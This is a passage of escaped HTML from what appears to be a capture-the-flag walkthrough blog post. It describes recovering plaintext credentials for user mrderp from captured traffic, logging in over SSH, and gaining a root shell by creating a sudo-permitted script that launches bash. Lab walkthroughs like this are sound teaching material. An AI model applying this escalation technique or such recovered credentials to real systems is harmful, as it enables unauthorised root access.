medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Opening with &lt;b&gt;wireshark&lt;/b&gt;:&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEindEkbh342MhAKuUd8_HOL5ZeO9rLtdwsIUsMRf4PMk_dNYGKZKl4n2VHEkbjC-QdsMKDpofhAz6o5aic1_f_nkBiipnKrOJOssv5WLZBShqqKDQGk1iDo-oqJkSvw-SiPJkVocKKBJ_xuFzRqywI-JWv_mPt4MH_KTnn5Zavs26AHyD_ziA5ZG3kbMw&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;47&quot; data-original-width=&quot;389&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEindEkbh342MhAKuUd8_HOL5ZeO9rLtdwsIUsMRf4PMk_dNYGKZKl4n2VHEkbjC-QdsMKDpofhAz6o5aic1_f_nkBiipnKrOJOssv5WLZBShqqKDQGk1iDo-oqJkSvw-SiPJkVocKKBJ_xuFzRqywI-JWv_mPt4MH_KTnn5Zavs26AHyD_ziA5ZG3kbMw=s16000&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEip8MVyrFEmkTw5BH0Zr_ZhIDZI75GI75rgREC_p38Fi30cltRNgbaPM1sT2b0jf6fgc7HETmEGxeGU9jT1nBIeD5CoW-QNTDilVP3UZXuJJFegiPax7PRRtfN4WWnxFVYo9GSvORpXDy-lPpw2F9xBPiY7mJ0yP8RlWKFK_cCi8JxN8xsHAj9xtmwvFQ&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;527&quot; data-original-width=&quot;946&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEip8MVyrFEmkTw5BH0Zr_ZhIDZI75GI75rgREC_p38Fi30cltRNgbaPM1sT2b0jf6fgc7HETmEGxeGU9jT1nBIeD5CoW-QNTDilVP3UZXuJJFegiPax7PRRtfN4WWnxFVYo9GSvORpXDy-lPpw2F9xBPiY7mJ0yP8RlWKFK_cCi8JxN8xsHAj9xtmwvFQ=s16000&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEiKW8OyBto83AkIZixD642WPodLSLfDiOSyLiCpNpJ3_1o7jgOxBdMQLogboNh3S8gzONIY1Mkpdcj3qwq_sF8C73Et4Nz-XPelTjsgCplwUw5zsu-yODM95AFQ-DHnXdLzaQr4uAnCCGZV-KSnMJhxHnpI-xXw53tiluMlJc05QrQzv4MHk0DLTLllnA&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;261&quot; data-original-width=&quot;1618&quot; height=&quot;157&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEiKW8OyBto83AkIZixD642WPodLSLfDiOSyLiCpNpJ3_1o7jgOxBdMQLogboNh3S8gzONIY1Mkpdcj3qwq_sF8C73Et4Nz-XPelTjsgCplwUw5zsu-yODM95AFQ-DHnXdLzaQr4uAnCCGZV-KSnMJhxHnpI-xXw53tiluMlJc05QrQzv4MHk0DLTLllnA=w976-h157&quot; width=&quot;976&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Follow the TCP stream we discover credentials&amp;nbsp;&lt;b&gt;mrderp:derpderpderpderpderpderpderp&lt;/b&gt;:&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEiA_7J96cF8qxaF1AcidtmwvPumDDhelNrkikqlXAUbhBmJ-jR9FODzqr1zybwDzlnz5PtyOD3-iLKVUQcbQcXRfvOjlhG6wPAcufT7mPZXiuO-zrnbufyma3CwpHskvp65CVz457wEOYoRlZMjLiEhAiC59IpF4er4t9t8bWyRX9yj4RjXqP1ggnIPtA&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;50&quot; data-original-width=&quot;853&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEiA_7J96cF8qxaF1AcidtmwvPumDDhelNrkikqlXAUbhBmJ-jR9FODzqr1zybwDzlnz5PtyOD3-iLKVUQcbQcXRfvOjlhG6wPAcufT7mPZXiuO-zrnbufyma3CwpHskvp65CVz457wEOYoRlZMjLiEhAiC59IpF4er4t9t8bWyRX9yj4RjXqP1ggnIPtA=s16000&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEg-EJyikrV1UseyWHCfKeDl2iuJejsXJphKPfRoZDSNiIRfGEJ4idJAycHiql80d9E9VbTBDgump7ZzMD4zZjm5Z8Qd68yr1XX-AvxHLnwGVHdy36eYEzkYbdfdi-Kv8pvoH6xdOso1jyBM4ZdFCrmhpdzpl7COgtU_9rD1D1oBHdUEUIJe2gy_t5paAQ&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;50&quot; data-original-width=&quot;854&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEg-EJyikrV1UseyWHCfKeDl2iuJejsXJphKPfRoZDSNiIRfGEJ4idJAycHiql80d9E9VbTBDgump7ZzMD4zZjm5Z8Qd68yr1XX-AvxHLnwGVHdy36eYEzkYbdfdi-Kv8pvoH6xdOso1jyBM4ZdFCrmhpdzpl7COgtU_9rD1D1oBHdUEUIJe2gy_t5paAQ=s16000&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;color: #6fa8dc; font-family: arial; font-size: medium;&quot;&gt;&lt;b&gt;4 - PRIVILEGE ESCALATION&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- SSH-ing for user &lt;b&gt;mrderp&lt;/b&gt;:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjL6Ial9vaBj7jKheMtFJ4C3bQO22C3LHFql1J3C6pTqn80SR81l4r95gHx4SxPJNmdlNlRJjwfLr6kyf5oet0mlgw50OAnZzPtagEmKD13NT0K_0nAkKDfZZADVFdkWZQdSTunRiIiBXK_n9W2_wjVs3E8v_j-oWyjCgmTZ-TBP8w-9H_TXxNdRAezQw&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;824&quot; data-original-width=&quot;667&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjL6Ial9vaBj7jKheMtFJ4C3bQO22C3LHFql1J3C6pTqn80SR81l4r95gHx4SxPJNmdlNlRJjwfLr6kyf5oet0mlgw50OAnZzPtagEmKD13NT0K_0nAkKDfZZADVFdkWZQdSTunRiIiBXK_n9W2_wjVs3E8v_j-oWyjCgmTZ-TBP8w-9H_TXxNdRAezQw=s16000&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial;&quot;&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;span style=&quot;font-family: arial;&quot;&gt;- Checking for &lt;/span&gt;&lt;b style=&quot;font-family: arial;&quot;&gt;mrderp&lt;/b&gt;&lt;span style=&quot;font-family: arial;&quot;&gt;&#39;s sudoer privileges:&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjWhH6a8Fx1Nm-2tgn4Z5mOeXkh-NJpeElKi-WQc1BKcn5J-Yf9SV0EE4q58xN-17vrs08M9w5PWEFE-6-A98qbF7gXZm--W9MA7AufzG4mrSMljQBZ67wtIrTkIkVyymcmkLUfPgP77H43KnJBe1Ep4XP9fAY6Gyb4f1HGND-L53r9yU8q-g5d4WCeKg&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;163&quot; data-original-width=&quot;658&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjWhH6a8Fx1Nm-2tgn4Z5mOeXkh-NJpeElKi-WQc1BKcn5J-Yf9SV0EE4q58xN-17vrs08M9w5PWEFE-6-A98qbF7gXZm--W9MA7AufzG4mrSMljQBZ67wtIrTkIkVyymcmkLUfPgP77H43KnJBe1Ep4XP9fAY6Gyb4f1HGND-L53r9yU8q-g5d4WCeKg=s16000&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- However when going to &lt;b&gt;/home/mrderp&lt;/b&gt; the surprise is that &lt;b&gt;/binaries/derpy*&lt;/b&gt; does not exist:&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEiAMKLDcVS7yoIwK6XyWwOlNueKdHRXnO8I-STZKKPdcFYdoH40DIm6sCETyZgtPvFiEUoWILZ5zzSizo92QX4IkydL9cVbnqonPlnmmyX56hsE5_G2OhffUyDBrdXbavoVxFiLMZRYf4cxsBWeyAkqR5lsaR6juXPyADPiAUDgO9yWG9nGUXWF8lnWPg&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;487&quot; data-original-width=&quot;760&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEiAMKLDcVS7yoIwK6XyWwOlNueKdHRXnO8I-STZKKPdcFYdoH40DIm6sCETyZgtPvFiEUoWILZ5zzSizo92QX4IkydL9cVbnqonPlnmmyX56hsE5_G2OhffUyDBrdXbavoVxFiLMZRYf4cxsBWeyAkqR5lsaR6juXPyADPiAUDgO9yWG9nGUXWF8lnWPg=s16000&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Creating folder &lt;b&gt;/binaries&lt;/b&gt; and script &lt;b&gt;derpy1.sh&lt;/b&gt;, passing to it &lt;b&gt;&quot;bin/bash&#39;&#39;&lt;/b&gt;, and giving execution permissions:&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEi9UF9BstlNgsmmDbnhmIdDIVnCc32gkmJL8VqgMD_MNL0607qFmVoN9_gEbORt3dLX0Y0Ag5GhepS8yMWF1fJBD9dGyOjqIdbSBfDf7VXC6S6rCsTvGiQpdPYh7Zqnu8J47LdAXOueoKpHVuToUnFQrUPY3T5blToNXZdlNttnQvhK3JMgWXPsjbrWjA&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;91&quot; data-original-width=&quot;666&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEi9UF9BstlNgsmmDbnhmIdDIVnCc32gkmJL8VqgMD_MNL0607qFmVoN9_gEbORt3dLX0Y0Ag5GhepS8yMWF1fJBD9dGyOjqIdbSBfDf7VXC6S6rCsTvGiQpdPYh7Zqnu8J47LdAXOueoKpHVuToUnFQrUPY3T5blToNXZdlNttnQvhK3JMgWXPsjbrWjA=s16000&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Executing&amp;nbsp;&lt;b&gt;derpy1.sh&lt;/b&gt; with &lt;b&gt;sudo&lt;/b&gt; we get a root shell:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEiC8C6xkQy69oy_f9mF-8j4qly_-BQRaNmLiQlVGklXq1WzRUfN5j_65ndJL9FJ447H2ZuORnuSqcpJ1LTeD3Rewxf9vuLaL00NIINRZNk1pYMwoM_Sa_9ZP7O8SSgk4RfA0xiCtTof-NCv8tO7U0pSD_vjbZlUhvnYw-h9T9h1iGSFBXGDdM3aZiP2_A&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;72&quot; data-original-width=&quot;528&quot; 